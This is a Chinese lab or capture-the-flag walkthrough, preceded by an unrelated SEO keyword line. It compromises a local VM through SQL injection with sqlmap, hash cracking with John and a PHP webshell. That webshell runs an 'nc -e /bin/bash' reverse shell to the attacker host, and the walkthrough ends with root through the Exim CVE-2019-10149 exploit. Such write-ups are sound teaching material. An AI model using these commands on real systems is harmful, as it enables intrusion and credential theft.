深圳网站制作费用怎么做网站动态框

深圳网站制作费用,怎么做网站动态框,手表网站建设规划书,学校网站建设推进会攻击机#xff1a;192.168.10.40 靶机#xff1a;192.168.10.130 探测内网存活主机 扫描端口 nmap -A -p- -T4 192.168.10.0/24 -A -O # 操作系统识别 -sV # 服务与版本探测 -sC # 默认 NSE 脚本 --traceroute -p-:全端口扫描 -T4: -T决定的是时间控制策略#xf…攻击机192.168.10.40靶机192.168.10.130探测内网存活主机扫描端口nmap -A -p- -T4 192.168.10.0/24-A -O # 操作系统识别-sV # 服务与版本探测-sC # 默认 NSE 脚本--traceroute-p-:全端口扫描-T4: -T决定的是时间控制策略探测并发数超时阈值重传次数RTT 估算主机并行度信息类型详细内容IP 地址192.168.10.130主机状态Host is up(主机在线)延迟0.00062s(极低延迟表明在本地网络)网络距离1 hop(1 跳直接连接)MAC 地址00:0C:29:4F:04:C6制造商VMware(主机运行在 VMware 虚拟机环境中)操作系统 (推测)运行Linux 3.X设备类型general purpose(通用设备)在robots.txt文件中列举出了32个禁止访问的路径。扫描目录dirsearch -u http://192.168.10.130 -e* -i 200-e*(星号) 的作用是告诉 dirsearch 使用它配置文件中定义的所有默认扩展名进行测试。-i 200:只显示200响应码的访问网页收集网站信息Web渗透访问网页点击下面三个标签nid会随着变化说明这个界面是通过nid号控制的。在数字后面加个双引号会报一个数据库错误很明显这存在SQL注入漏洞。SQL注入sqlmap直接跑三个注入方式数字注入报错注入时间注入。sqlmap -u http://192.168.10.130/?nid1 --batch爆破数据库sqlmap -u http://192.168.10.130/?nid1 --risk3 --level5 --dbsinformation_schema是系统数据库d7db是我们要查询的对象爆破数据表sqlmap -u http://192.168.10.130/?nid1 --risk3 --level5 -D d7db --tables爆破字段sqlmap -u http://192.168.10.130/?nid1 --risk3 --level5 -D d7db -T users --columns在字段列表中name和pass两个字段查看字段内容sqlmap -u http://192.168.10.130/?nid1 --risk3 --level5 -D d7db -T users -C name,pass --dump得到用户名和加密后的密码$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF密码破解把密码放入一个.txt文本中使用john工具对密码进行解密,破解出一个密码这个密码是john的admin的密码没有破解出来。john/turtle直接登录网站可用在里面写入一个木马写入一个木马随便填入信息之后提交传入的php代码执行了可用执行PHP代码就可以开始反弹shell了。?php system(nc -e /bin/bash 192.168.10.40 5555);?攻击机开始监听连接成功执行python代码获取一个交互式的shell。python -c import pty;pty.spawn(/bin/bash)权限为www权限提升查看具有suid提权的文件在列出的文件中有一个exim4文件这是个漏洞点 CVE-2019-10149即 Exim 4.87-4.91 的 Return of the WIZard 漏洞 。find / -user root -perm -4000 -print 2/dev/nullsearchsploit exim 4搜索相关漏洞把漏洞的脚本复制下来。searchsploit的作用在本地库中快速查找软件已经公开的漏洞利用代码POC。复制脚本把脚本下载到靶机中先把脚本放到攻击机中的/var/www/html目录下随后开启apache服务在靶机的/tmp目录中下载脚本其它目录没有下载权限在列出的权限列表中当前目录的权限最后一位为t这个是/tmp目录的安全特性写入和读取权限目录的rwx权限允许任何用户在/tmp中创建、写入和读取文件。 他也有个限制 一个用户只能删除或重命名由他自己创建的文件。给脚本添加权限并执行脚本成功提权在/root目录下找到了flag查看flag。使用的相关工具nmap端口探测sqlmap 数据库爆破网站漏洞反弹shelljohn密码破解searchsploit 漏洞利用工具总结端口探测出可使用的端口以及对应的服务如果有可访问的网站之后对网站做信息收集收集网站使用的架构前端和后端的信息找到相关搜索框进行测试SQL语句XSS,命令注入文件包含等都可以进行测试找到响应的漏洞点之后进行针对性的测试比如说使用工具sqlmapbp,手动注入等。在找到漏洞点后扩大漏洞的危害找寻网站的相关漏洞的payload提权拿root。